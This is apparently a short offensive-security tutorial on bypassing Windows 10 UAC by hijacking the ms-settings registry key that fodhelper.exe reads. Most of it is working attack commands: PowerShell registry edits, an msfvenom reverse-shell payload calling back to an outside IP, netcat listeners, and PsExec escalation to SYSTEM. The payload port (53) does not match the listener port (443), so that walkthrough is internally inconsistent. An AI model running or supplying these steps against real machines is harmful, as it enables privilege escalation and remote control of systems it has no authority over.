Using fodhelper to bypass UAC in Windows 10

Users of Windows 10 environments can control language preferences for a number of Windows features, including text-to-speech and typing. A process with the name fodhelper.exe is launched whenever a user asks to open “Manage Optional Features” in Windows Settings to change the language. Due to its binary’s autoelevate setting being set to “true,” this process is operating with high integrity.

Check Permission

If we are in Medium Mandatory Level or High Mandatory Level group, we can use fodhelper to bypass UAC.

Manual Check Method

whoami /groups

Using Tools

Sharpup.exe can be used to decide the possibility that UAC could be bypassed.

GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)

SharpUp.exe "audit"

Step to bypass UAC with fodhelper.

Via RDP

1. We run command following via powershell to Create Registry Structure.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

2. We run the command following via Powershell to add register property.

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

3. Run Fodhelper

fodhelper

We’ll get cmd with Administrator Privilege.

Reverse Shell

We can reverse shell with UAC bypass.

1. We use msfvenom to generate reverse.exe with reverse shell payload.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.214 LPORT=53 -f exe > reverse.exe

2. We run command following via powershell to Create Registry Structure.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value c:\users\public\reverse.exe -Force

3. We run the command following via Powershell to add register property.

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

4. We use nc to listen on port 443.

nc -lnvp 443

5. We run fodhelper.

fodhelper

6. We’ll get shell as 2bit.

Get shell as system.

We can using PsExec before bypass UAC to get shell as system.

1. We use nc to listen on port 443.

nc -lnvp 443

2. Run the command following to execute reverse.exe with PsExec.

PsExec64.exe -accepteula -i -s C:\users\2bit\Documents\reverse.exe

3. We get shell as ny authority\system